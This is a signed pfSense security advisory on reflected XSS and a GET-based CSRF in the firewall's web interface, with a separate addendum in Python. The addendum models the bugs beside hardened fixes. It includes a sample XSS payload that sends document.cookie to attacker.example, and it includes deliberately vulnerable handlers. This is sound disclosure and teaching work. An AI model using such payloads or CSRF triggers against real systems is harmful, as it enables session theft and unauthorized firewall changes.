-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=============================================================================
pfSense-SA-17_03.webgui                                     Security Advisory
                                                                      pfSense

Topic:          Multiple XSS and CSRF Vulnerabilities in the WebGUI

Category:       pfSense Base System
Module:         webgui
Announced:      2017-02-10
Credits:        Tim Coen - Curesec GmbH
Affects:        pfSense software version <= 2.3.2_1
Corrected:      2017-02-07 18:35:24 UTC (pfSense/master, pfSense 2.4)
                2017-02-07 18:37:03 UTC (pfSense/RELENG_2_3, pfSense 2.3.x)
                2017-02-07 18:37:07 UTC (pfSense/RELENG_2_3_2, pfSense 2.3.2_x)

0.   Revision History

     v1.0  2017-02-10  Initial release

I.   Background

pfSense® software is a free network firewall distribution based on the
FreeBSD operating system. The pfSense software distribution includes
third-party free software packages for additional functionality, and
provides most of the functionality of common commercial firewalls.

The majority of users of pfSense software have never installed or used a
stock FreeBSD system. Unlike similar GNU/Linux-based firewall
distributions, there is no need for any UNIX knowledge. The command line
is never used, and there is no need to ever manually edit any rule sets.
Instead, pfSense software includes a web interface for the configuration
of all included components. Users familiar with commercial firewalls will
quickly understand the web interface, while those unfamiliar with
commercial-grade firewalls may encounter a short learning curve.

II.  Problem Description

Multiple Cross-Site Scripting (XSS) vulnerabilities and one CSRF issue were
found in the pfSense software WebGUI on version 2.3.2_1 and earlier.

On pkg_mgr_install.php, the "from" and "to" parameters are vulnerable to
reflected XSS when performing a reinstall action.

On pkg.php, the "pkg_filter" parameter is vulnerable to reflected XSS when
a package XML file contains a field type of "sorting" which also has
"include_filtering_inputbox" active. Currently the only affected package
is FreeRADIUS (freeradius.xml and freeradiusauthorizedmacs.xml both meet
these conditions).

The easyrule.php script acts on GET variables, making it possible to add
new firewall rules via CSRF.

III. Impact

Due to the lack of proper output encoding on the affected variables and
pages susceptible to XSS, arbitrary JavaScript can be executed in the
user's browser. The user's session cookie or other information from the
session may be compromised.

Due to the use of GET on easyrule.php, a firewall administrator could
unknowingly create an unwanted firewall rule if they are the victim of a
CSRF attack.

IV.  Workaround

To mitigate the problem on older releases, use one or more of the following:

* Limit access to the affected pages to trusted administrators only.

* Do not log into the firewall with the same browser used for
  non-administrative web browsing.

V.   Solution

Upgrade to version 2.3.3 of the pfSense software, or a later version. This
may be performed in the web interface or from the console.

See https://doc.pfsense.org/index.php/Upgrade_Guide

VI.  Correction details

The following list contains the correction revision numbers for each
affected item.

Branch/path                                                      Revision
- - -------------------------------------------------------------------------
pfSense/master                         2c06742d784cb7ec85151327fd753536d98fbcc1
                                       ed7bfaa4b99fc6d4c4f3b2be1dfd738f3cc8e16b
                                       0f026089f65d92328d680443de5f9a90af50115c
pfSense/RELENG_2_3                     082f3663d2ac75e1f7e718715ea23b0168a866a7
                                       7100f0410b02d152f12f95fa892c427b06ec26c0
                                       4cef56bf20314009ad83bf747901ed1adeda8c70
pfSense/RELENG_2_3_2                   ede8a9537ef9d15f8c1d288d9e89d4476a84656f
                                       ed7bfaa4b99fc6d4c4f3b2be1dfd738f3cc8e16b
                                       f0cf40f964f2a559ddcf495f492bd9d38f924512
- - -------------------------------------------------------------------------

VII. References

The latest revision of this advisory is available at
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJYneCxAAoJEBO5h/2SFPjaDegQAMFyO8tC2fUGpFUU1Rqtb0F0
HYiC1aCGbRbhUeLXyKTYm2Nyy4CUlnhErVPrcSSjf5/s8vQSS5TpLWIcmWgJkiNg
CMcflabTcbq/rQCAQv6bPVa/EjV1sXa2OFVYjl2cuJmkP+yoTpKE4DbbNVZHvgsA
gfFzXNLM0LYIROLRp15dgJGKZk6QUG+Xb0n9ssP8dj95m/OVZ8P1ChXlXb6ysEEl
aZdKLVEIOtb04aZW0+3KMGzmxziIsVsU3lDRyBpbi/EOl5uJZR9q3YTCcxgIP6Hh
ZCZJ4mIBeuWMt7SV1J6xKBV//p9UoG4FTF2eSn5TBQoFpNhkvNElTmmO9LfAYpCz
bIUBB8pGCT199TvFN08TZPyMXQfZDQ3fq6W1MYSfzMYBXauVuELG+4jROV2RkJB2
28NcpY0CmoTM3QjJQY5krgA4iI9WoIz/EZ85mecvvJ4SOXSlyJaDWGvGFNl4kFEG
TDBmZ6/yMI3sQCiJ4Ngc4Sig+B9h9K9h/cAuZluT6NYsV454G7lcQfQwT/0J2U34
+sAqcZL+zcRlK5x2CSCWJMCogj30K8LXJscAqS5T6ja1vJ9MKewpmIZtGJbiGa8N
jadQ/bKiRxBBOBgj/m//+JbUUK01rWy1brc6txPNt8/SnkVB9NjPO5h03OOpchPx
v9u2MIQcICFxGMB5k5AZ
=pUrT
-----END PGP SIGNATURE-----
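Editor's addendum, outside the signed text above: the following Python models the two bug classes that Sections II and III describe, a request parameter reflected into markup without output encoding (pkg_mgr_install.php "from"/"to", pkg.php "pkg_filter") beside its encoded form, and a state-changing action reachable by a plain GET (easyrule.php) beside a handler that requires POST plus a session-bound token. It is added illustrative code, not the pfSense WebGUI source (which is PHP) and not the project's fix. The Request class, the rule list, the easyrule parameter names (action, int, src), the field name csrf_token and the payload string are constructed assumptions for the example.

```python
import hmac
import html
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Constructed stand-in for one HTTP request reaching the WebGUI."""
    method: str
    query: dict = field(default_factory=dict)    # GET parameters
    form: dict = field(default_factory=dict)     # POST body fields
    session: dict = field(default_factory=dict)  # server-side session state


# Constructed payload: closes the quoted attribute it lands in, then injects
# a script that ships the session cookie to an attacker-controlled host.
XSS_PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'


# --- Reflected XSS: pkg_mgr_install.php "from" / "to" -----------------------

def render_reinstall_vulnerable(req: Request) -> str:
    """The pattern the advisory describes: parameters echoed into markup verbatim."""
    frm = req.query.get("from", "")
    to = req.query.get("to", "")
    return (f'<input type="hidden" name="from" value="{frm}">'
            f'<input type="hidden" name="to" value="{to}">')


def render_reinstall_fixed(req: Request) -> str:
    """Hardened form: HTML-encode every user-controlled value, quotes included,
    at the point where it is written into markup."""
    frm = html.escape(req.query.get("from", ""), quote=True)
    to = html.escape(req.query.get("to", ""), quote=True)
    return (f'<input type="hidden" name="from" value="{frm}">'
            f'<input type="hidden" name="to" value="{to}">')


def is_injected(markup: str) -> bool:
    """True if the payload survived as live markup rather than encoded text."""
    return "<script>" in markup


# --- CSRF: easyrule.php -------------------------------------------------------

def easyrule_vulnerable(req: Request, rules: list) -> int:
    """State change driven by GET alone. Any page the logged-in admin visits can
    fire it with <img src="https://firewall/easyrule.php?action=block&...">.
    Parameter names (action, int, src) are illustrative assumptions."""
    if req.query.get("action") == "block":
        rules.append(("block", req.query.get("int"), req.query.get("src")))
        return 200
    return 400


def issue_csrf_token(session: dict) -> str:
    """Mint an unguessable per-session token, stored server-side and embedded
    in the form the real page would render."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def easyrule_fixed(req: Request, rules: list) -> int:
    """Hardened form: no state change on GET, and the POST must carry the
    session's token. compare_digest avoids a timing side channel."""
    if req.method != "POST":
        return 405
    expected = req.session.get("csrf_token", "")
    supplied = req.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403
    if req.form.get("action") == "block":
        rules.append(("block", req.form.get("int"), req.form.get("src")))
        return 200
    return 400


if __name__ == "__main__":
    q = {"from": "1.0", "to": XSS_PAYLOAD}
    print("vulnerable renderer injected:", is_injected(render_reinstall_vulnerable(Request("GET", q))))
    print("fixed renderer injected:     ", is_injected(render_reinstall_fixed(Request("GET", q))))
    forged = Request("GET", {"action": "block", "int": "wan", "src": "203.0.113.7"})
    print("forged GET vs vulnerable:", easyrule_vulnerable(forged, []))
    print("forged GET vs fixed:     ", easyrule_fixed(forged, []))
```

Run stand-alone, the vulnerable renderer emits the payload's script tag intact while the fixed one emits it as &lt;script&gt; inside a still-closed attribute, and the forged GET creates a rule only against the vulnerable handler. Refusing GET is necessary but not sufficient against CSRF, because a hostile page can auto-submit a cross-origin POST form; the session-bound token is what ties the request to a page the firewall itself served, and the constant-time compare keeps the token check from leaking which prefix was right.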